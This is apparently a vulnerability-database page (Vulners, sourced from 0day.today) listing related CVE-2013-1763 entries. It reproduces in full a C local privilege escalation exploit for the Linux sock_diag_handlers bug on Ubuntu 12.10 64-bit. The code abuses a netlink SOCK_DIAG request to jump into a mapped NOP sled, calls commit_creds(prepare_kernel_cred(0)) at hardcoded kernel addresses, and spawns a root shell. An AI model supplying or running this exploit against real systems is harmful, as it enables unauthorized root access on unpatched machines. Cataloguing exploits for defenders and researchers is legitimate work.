Vulners
Lucene search
Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit
| Reporter | Title | Published | Views | Family All 130 |
|---|---|---|---|---|
 | Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit | 17 May 201400:00 | – | zdt |
| Linux Kernel 3.5.0-23 (Ubuntu 12.04.2 x64) - SOCK_DIAG SMEP Bypass Local Privilege Escalation Exploi | 19 Mar 201800:00 | – | zdt |
 | CVE-2013-1763 | 24 Feb 201300:00 | – | circl |
 | CVE-2013-1763 | 28 Feb 201319:00 | – | cve |
 | CVE-2013-1763 | 28 Feb 201319:00 | – | cvelist |
 | CVE-2013-1763 | 28 Feb 201319:00 | – | debiancve |
 | Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3) | 24 Feb 201300:00 | – | exploitdb |
| Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation | 26 Aug 201500:00 | – | exploitdb |
 | EUVD-2013-1789 | 28 Feb 201319:00 | – | euvd |
 | Linux Kernel 3.3 3.8 (Ubuntu Fedora 18) - sock_diag_handlers() Local Privilege Escalation (3) | 24 Feb 201300:00 | – | exploitpack |
10
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
x()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
int main() {
int fd;
unsigned long mmap_start, mmap_size = 0x10000;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[8192];
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socket\n");
return -1;
}
memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;
req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
/* Ubuntu 12.10 x86_64 */
req.r.sdiag_family = 0x37;
commit_creds = (_commit_creds) 0xffffffff8107d180;
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
mmap_start = 0x1a000;
if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
printf("mmap fault\n");
exit(1);
}
*(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
memset((void *)mmap_start, 0x90, mmap_size);
memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));
send(fd, &req, sizeof(req), 0);
if(!getuid())
system("/bin/sh");
}
# 0day.today [2018-03-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Mar 2013 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.15053